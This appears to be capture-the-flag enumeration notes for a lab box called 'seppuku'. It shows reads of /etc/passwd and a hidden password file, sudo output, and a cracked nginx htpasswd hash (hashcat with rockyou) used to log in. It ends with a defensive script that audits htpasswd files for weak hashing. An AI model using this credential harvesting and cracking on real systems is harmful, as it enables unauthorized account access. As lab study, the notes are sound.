# 7 box enum seppuku

```
# seppuku:eeyoree

seppuku@seppuku:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
[truncated]
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
samurai:x:1001:1002:,,,:/home/samurai:/bin/rbash
tanto:x:1002:1003:,,,:/home/tanto:/bin/rbas

seppuku@seppuku:~$ cat .passwd
12345685213456!@!@A
# works for samurai user

seppuku@seppuku:~$ sudo -l
Matching Defaults entries for seppuku on seppuku:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User seppuku may run the following commands on seppuku:
    (ALL) NOPASSWD: /usr/bin/ln -sf /root/ /tmp/
	
# this will basically create a symlink /tmp/root that points to /root/

seppuku@seppuku:/tmp$ ls -la /tmp/root
lrwxrwxrwx 1 root root 6 Aug 27 01:40 /tmp/root -> /root/

# but we can't read anything due to perms
seppuku@seppuku:/tmp$ ls -la /tmp/root/
ls: cannot open directory '/tmp/root/': Permission denied
```

### PEAS

```
╣ Analyzing Htpasswd Files (limit 70)
-rw-r--r-- 1 root root 44 May 13  2020 /etc/nginx/.htpasswd
admin:$apr1$sHVvV4Vi$FFQ2lYSWSsNM/gDRPXPgr1

$ hashcat -m 1600 hash /usr/share/wordlists/rockyou.txt --show
$apr1$sHVvV4Vi$FFQ2lYSWSsNM/gDRPXPgr1:Football
# admin:Football works on http://192.168.131.90/
# basic auth successful
```
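Added example, not part of the original notes: a small audit for the condition linPEAS surfaced above, a world-readable htpasswd file whose entry uses the fast `$apr1$` MD5 scheme. The scheme table and the accept/reject policy are assumptions of this example, and the `backup` line in the sample is constructed.

```python
import os
import stat
import sys

# (prefix, scheme name, acceptable) -- policy is this example's assumption:
# only slow, salted crypt schemes pass; fast or unsalted digests are flagged.
SCHEMES = [
    ("$2y$", "bcrypt", True), ("$2b$", "bcrypt", True), ("$2a$", "bcrypt", True),
    ("$6$", "sha512-crypt", True), ("$5$", "sha256-crypt", True),
    ("$apr1$", "apr1-md5", False), ("$1$", "md5-crypt", False),
    ("{SHA}", "unsalted-sha1", False), ("{SSHA}", "salted-sha1", False),
    ("{PLAIN}", "plaintext", False),
]

def classify(hash_field):
    """Map an htpasswd hash field to (scheme, acceptable)."""
    for prefix, name, ok in SCHEMES:
        if hash_field.startswith(prefix):
            return name, ok
    return "des-crypt-or-plaintext", False

def audit_htpasswd(text, mode):
    """Return findings for htpasswd content and its st_mode."""
    findings = []
    if mode & stat.S_IROTH:  # any local user can copy the hashes
        findings.append("file is world-readable")
    for n, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        user, sep, hash_field = line.partition(":")
        if not sep:
            findings.append(f"line {n}: malformed entry")
            continue
        name, ok = classify(hash_field)
        if not ok:
            findings.append(f"line {n}: user {user!r} uses weak scheme {name}")
    return findings

# First line is the entry shown on this page; second line is constructed.
SAMPLE = ("admin:$apr1$sHVvV4Vi$FFQ2lYSWSsNM/gDRPXPgr1\n"
          "backup:$2y$10$CONSTRUCTEDPLACEHOLDERHASHVALUE\n")

if __name__ == "__main__":
    for f in audit_htpasswd(SAMPLE, 0o100644):  # mode from the ls line above
        print("sample:", f)
    for path in sys.argv[1:]:  # optionally audit real files
        with open(path) as fh:
            for f in audit_htpasswd(fh.read(), os.stat(path).st_mode):
                print(f"{path}: {f}")
```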

